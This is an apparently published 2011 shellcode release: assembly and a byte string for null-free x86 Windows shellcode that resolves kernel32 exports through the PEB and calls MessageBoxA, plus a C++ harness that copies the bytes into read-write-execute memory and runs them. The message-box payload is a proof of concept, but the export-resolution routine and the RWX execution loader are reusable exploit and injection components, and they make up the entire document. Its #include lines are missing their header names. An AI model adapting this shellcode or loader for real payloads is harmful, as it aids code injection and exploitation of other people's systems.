/* ;------------------------------------------------------------------------ ;Title...................All Windows Null-free MessageBoxA Shellcode ;........................167 Bytes ;Release Date............7/11/2011 ;Tested On...............Windows 2000, Windows XP, Windows XP x64, ;........................Windows Vista, Windows 7, Windows 8 M3 x64 ;------------------------------------------------------------------------ ;Author..................John Leitch ;Site....................http://www.autosectools.com/ ;Email...................john@autosectools.com ;------------------------------------------------------------------------ bits 32 xor ebx, ebx jmp short start ;================================ ;Find Function ;================================ find_function: ;================================ ;Find Kernel32 Base ;================================ mov edi, [fs:ebx+0x30] mov edi, [edi+0x0c] mov edi, [edi+0x1c] module_loop: mov eax, [edi+0x08] mov esi, [edi+0x20] mov edi, [edi] cmp byte [esi+0x0C], '3' jne module_loop ;================================ ;Kernel32 PE Header ;================================ mov edi, eax add edi, [eax+0x3c] ;================================ ; Export directory table ;================================ ;0x00 Export Flags ;0x04 Time/Date Stamp ;0x08 Major Version ;0x0A Minor Version ;0x0C Name RVA ;0x10 Ordinal Base ;0x14 Address Table Entries ;0x18 Number Of Names ;0x1c Address Table RVA ;0x20 Name Pointer Table RVA ;0x24 Ordinal Table RVA ;================================ ;================================ ;Kernel32 Export Directory Table ;================================ mov edx, [edi+0x78] add edx, eax ;================================ ;Kernel32 Name Pointers ;================================ mov edi, [edx+0x20] add edi, eax ;================================ ;Find LoadLibraryA ;================================ mov ebp, ebx name_loop: mov esi, [edi+ebp*0x4] add esi, eax inc ebp mov ecx, [esp+0x4] cmp dword [esi], ecx jne name_loop mov ecx, [esp+0x8] cmp dword [esi+0x4], ecx jne name_loop ;================================ ;LoadLibraryA Ordinal ;================================ mov edi, [edx+0x24] add edi, eax mov bp, [edi+ebp*0x2] ;================================ ;LoadLibraryA Address ;================================ mov edi, [edx+0x1C] add edi, eax mov edi, [edi+(ebp-0x1)*0x4] ;subtract ordinal base add eax, edi ret start: ;================================ ;Call LoadLibraryA ;================================ push 0x7262694C ;Libr push 0x64616F4C ;Load call find_function xor ecx, ecx mov cx, 0x3233 ;32 push ecx push 0x72657375 ;user push esp ; lpFileName call eax push eax ;================================ ;Call GetProcAddress ;================================ push 0x41636F72 ;rocA push 0x50746547 ;GetP call find_function pop ecx pop ecx pop ecx push 0x041786F0; oxA shr dword [esp], 0x4 push 0x42656761; ageB push 0x7373654D; Mess push esp ; lpProcName push ecx ; hModule call eax ;================================ ;Call MessageBoxA ;================================ push ebx push ebx push ebx push ebx call eax */ #include #include using namespace std; int main() { char* shellcode = "\x31\xdb\xeb\x55\x64\x8b\x7b\x30" "\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47" "\x08\x8b\x77\x20\x8b\x3f\x80\x7e" "\x0c\x33\x75\xf2\x89\xc7\x03\x78" "\x3c\x8b\x57\x78\x01\xc2\x8b\x7a" "\x20\x01\xc7\x89\xdd\x8b\x34\xaf" "\x01\xc6\x45\x8b\x4c\x24\x04\x39" "\x0e\x75\xf2\x8b\x4c\x24\x08\x39" "\x4e\x04\x75\xe9\x8b\x7a\x24\x01" "\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c" "\x01\xc7\x8b\x7c\xaf\xfc\x01\xf8" "\xc3\x68\x4c\x69\x62\x72\x68\x4c" "\x6f\x61\x64\xe8\x9c\xff\xff\xff" "\x31\xc9\x66\xb9\x33\x32\x51\x68" "\x75\x73\x65\x72\x54\xff\xd0\x50" "\x68\x72\x6f\x63\x41\x68\x47\x65" "\x74\x50\xe8\x7d\xff\xff\xff\x59" "\x59\x59\x68\xf0\x86\x17\x04\xc1" "\x2c\x24\x04\x68\x61\x67\x65\x42" "\x68\x4d\x65\x73\x73\x54\x51\xff" "\xd0\x53\x53\x53\x53\xff\xd0"; printf("shellcode length: %i", strlen(shellcode)); LPVOID lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(lpAlloc, shellcode, strlen(shellcode)); ((void(*)())lpAlloc)(); return 0; }